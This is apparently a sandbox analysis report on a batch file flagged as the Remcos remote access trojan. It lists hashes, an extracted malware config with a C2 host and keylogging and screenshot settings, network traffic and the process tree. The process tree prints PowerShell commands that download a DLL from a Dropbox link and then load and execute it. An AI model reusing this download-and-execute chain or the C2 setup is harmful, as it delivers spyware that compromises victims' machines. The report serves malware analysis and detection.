Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

test - Kopie.bat

windows11-21h2-x64

10

Analysis

  • max time kernel
    5s
  • max time network
    5s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24/11/2024, 11:22 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test - Kopie.bat

  • Size

    1000B

  • MD5

    f364dfa42131d286a5253dd2a1f2213b

  • SHA1

    893c1931e8e126860a7effa4e471568b50c804fb

  • SHA256

    f5b8e9f90ea1cb2cb478f0ab64d60687bf1c3fd545037dc7820dbe359a80cb0f

  • SHA512

    e1b0a0a46ef9259c38f1403c6fff5c31238118c6c42096a0e5d91e9b55361518f35b19546db3f636aa1a4ed8ec0adfcba5fe8ccdadbc465939818a8a6dc74604

Score
10/10
remcosremotehostexecutionrat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

23.ip.gl.ply.gg:24321

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    Rmc.exe

  • copy_folder

    RootRmc

  • delete_file

    true

  • hide_file

    true

  • hide_keylog_file

    false

  • install_flag

    true

  • install_path

    %SystemDrive%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-M1WJOM

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/ced931yp7ygkbsx3fibr1/test.dll?rlkey=23mh4gtrl35mfqlt6suof5w8d&st=evzmjztv&dl=1' -OutFile 'test.dll'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-Type -Path 'test.dll'; [TestClass]::Execute()"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:540

Network

  • flag-us
    DNS
    www.dropbox.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    www.dropbox.com
    IN A
    Response
    www.dropbox.com
    IN CNAME
    www-env.dropbox-dns.com
    www-env.dropbox-dns.com
    IN A
    162.125.64.18
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    uc5212b30854b0e36ab0869d8686.dl.dropboxusercontent.com
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    uc5212b30854b0e36ab0869d8686.dl.dropboxusercontent.com
    IN A
    Response
    uc5212b30854b0e36ab0869d8686.dl.dropboxusercontent.com
    IN CNAME
    edge-block-www-env.dropbox-dns.com
    edge-block-www-env.dropbox-dns.com
    IN A
    162.125.64.15
  • flag-us
    DNS
    18.64.125.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.64.125.162.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.64.125.162.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.64.125.162.in-addr.arpa
    IN PTR
    Response
  • 162.125.64.18:443
    www.dropbox.com
    tls
    powershell.exe
    979 B
     8.4kB
     8
    10
  • 162.125.64.15:443
    uc5212b30854b0e36ab0869d8686.dl.dropboxusercontent.com
    tls
    powershell.exe
    9.4kB
     497.2kB
     188
    361
  • 8.8.8.8:53
    www.dropbox.com
    dns
    powershell.exe
    227 B
     362 B
     3
    3

    DNS Request

    www.dropbox.com

    DNS Response

    162.125.64.18

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    uc5212b30854b0e36ab0869d8686.dl.dropboxusercontent.com

    DNS Response

    162.125.64.15

  • 8.8.8.8:53
    18.64.125.162.in-addr.arpa
    dns
    144 B
     244 B
     2
    2

    DNS Request

    18.64.125.162.in-addr.arpa

    DNS Request

    15.64.125.162.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    5f4c933102a824f41e258078e34165a7

    SHA1

    d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

    SHA256

    d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

    SHA512

    a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    5e6baeec02c3d93dce26652e7acebc90

    SHA1

    937a7b4a0d42ea56e21a1a00447d899a2aca3c28

    SHA256

    137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

    SHA512

    461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k334ylyl.xnp.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\test.dll
    Filesize

    465KB

    MD5

    c52987ac16d800661b0673db0e88e040

    SHA1

    8887a9096dd5baa81fc841fd4066978aabc66d66

    SHA256

    00f66290090abad9e0c8a98e659723a29ad621862a54ff7b67dc326b4cf74ae6

    SHA512

    5431218a44e0a26337b6ad78f4cf225c735a104751a542cb7d882e69ba711b3001d855199c7b91d6113eca2095257daacbb642cf1e84fa1c11e913f5d401782d

    Download Submit

  • memory/540-33-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/540-31-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/540-29-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/540-28-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/540-18-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-10-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-16-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-12-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-11-0x00007FFB676F0000-0x00007FFB681B2000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4768-0-0x00007FFB676F3000-0x00007FFB676F5000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4768-6-0x00000223FE6F0000-0x00000223FE712000-memory.dmp

    Filesize

    136KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.